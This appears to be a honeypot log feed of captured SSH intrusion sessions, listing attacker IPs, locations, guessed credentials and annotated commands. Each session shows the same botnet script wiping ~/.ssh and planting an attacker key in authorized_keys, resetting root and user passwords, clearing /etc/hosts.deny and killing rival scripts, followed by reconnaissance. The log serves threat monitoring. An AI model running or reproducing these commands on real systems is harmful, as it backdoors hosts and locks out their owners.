$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:gurhkbXGnU4q"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_56 (162.240.148.40) β€” Phoenix, United States Β· 1 session Β· 19 cmds
2026-05-13 11:12 EDT Β· as root/yangchen
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:p79u6LgTH51A"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_30 (101.227.203.162) β€” Shanghai, China Β· 1 session Β· 19 cmds
2026-05-13 11:10 EDT Β· as root/convergence
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Aig3Cu6N68ww"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 spice_root_18 (139.59.6.237) β€” Bengaluru, India Β· 1 session Β· 19 cmds
2026-05-13 11:03 EDT Β· as root/abc123321
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:1M04oAdArGfX"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_57 (38.12.30.135) β€” San Jose, United States Β· 3 sessions Β· 57 cmds
2026-05-13 10:05 EDT Β· as root/deeplearning, root/portal, root/root123!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:h70UR8VVwPS7"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:2Iey8Y9Wlcbp"|chpasswd|bash
$ echo "root:riGv49XPuEPJ"|chpasswd|bash
🎭 phantom_root_106 (123.58.213.128) β€” Hong Kong, Hong Kong Β· 3 sessions Β· 57 cmds
2026-05-13 10:04 EDT Β· as root/deeplearning, root/portal, root/root123!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:WRvd5Hpg2i7i"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:BCh5amZ7kF3R"|chpasswd|bash
$ echo "root:JzOrKauKn6WI"|chpasswd|bash
🎭 specter_root_104 (103.190.214.241) β€” Legian, Indonesia Β· 3 sessions Β· 59 cmds
2026-05-13 09:07 EDT Β· as alexis/alexis, jarservice/123, root/kid
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "alexis\nveSwEybVEBpt\nveSwEybVEBpt"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "alexis\nveSwEybVEBpt\nveSwEybVEBpt\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123\n9epQjVimggNY\n9epQjVimggNY"|passwd|bash
$ echo "123\n9epQjVimggNY\n9epQjVimggNY\n"|passwd
$ echo "root:o2U3KbC9qtwh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 monsoon_root_21 (152.52.15.214) β€” Bengaluru, India Β· 3 sessions Β· 59 cmds
2026-05-13 09:02 EDT Β· as alexis/alexis, jarservice/123, root/kid
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123\nkC35EEYvvfAP\nkC35EEYvvfAP"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123\nkC35EEYvvfAP\nkC35EEYvvfAP\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:CxvxUKXtfc1j"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "alexis\nvtoQEiAR14sb\nvtoQEiAR14sb"|passwd|bash
$ echo "alexis\nvtoQEiAR14sb\nvtoQEiAR14sb\n"|passwd
🎭 spice_root_19 (125.22.105.67) β€” Kolkata, India Β· 1 session Β· 19 cmds
2026-05-13 09:12 EDT Β· as root/kid
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:uDfCibL037Pd"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cosmo_root_8 (46.165.56.242) β€” Nizhny Tagil, Russia Β· 3 sessions Β· 58 cmds
2026-05-10 09:36 EDT Β· as csgoserver/123456, root/asd123456, root/jesse@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:ziJvrZ79DpV4"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:vA6JOnfXPYn4"|chpasswd|bash
$ echo -e "123456\nKMwNEzrEq33R\nKMwNEzrEq33R"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nKMwNEzrEq33R\nKMwNEzrEq33R\n"|passwd
🎭 specter_root_105 (165.154.6.144) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 38 cmds
2026-05-13 08:39 EDT Β· as root/asd123456, root/jesse@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:XOL33eisMRnS"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:FPpu55uJjcFg"|chpasswd|bash
🎭 samba_root_10 (189.113.47.155) β€” Campinas, Brazil Β· 1 session Β· 20 cmds
2026-05-13 08:53 EDT Β· as jarservice/123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123\nCeHLlDHVlYnK\nCeHLlDHVlYnK"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nCeHLlDHVlYnK\nCeHLlDHVlYnK\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_37 (218.0.56.78) β€” Hangzhou, China Β· 1 session Β· 19 cmds
2026-05-13 08:45 EDT Β· as root/QAZ@123cde
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:eSX4ITAnGDgW"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_31 (180.108.64.6) β€” Nanjing, China Β· 1 session Β· 19 cmds
2026-05-13 08:24 EDT Β· as root/Sp123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
